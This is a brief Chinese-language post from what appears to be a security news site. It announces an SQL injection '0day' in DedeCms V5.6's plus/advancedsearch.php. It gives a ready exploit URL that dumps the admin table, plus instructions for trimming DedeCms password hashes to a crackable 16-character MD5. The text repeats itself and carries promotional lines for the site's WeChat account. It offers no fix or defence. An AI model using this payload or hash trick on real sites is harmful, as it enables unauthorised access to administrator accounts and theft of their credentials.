DedeCms V5.6 注入 0day
plus/advancedsearch.php
$sql 变量未初始化。导致鸡助注入。
漏洞利用:
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
dede 的密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5。
标签: DedeCMS漏洞
关注网络与数据安全
“游侠安全网”微信公众号
关注网络与数据安全
plus/advancedsearch.php
$sql 变量未初始化。导致鸡助注入。
漏洞利用:
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
dede 的密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5。
“游侠安全网”微信公众号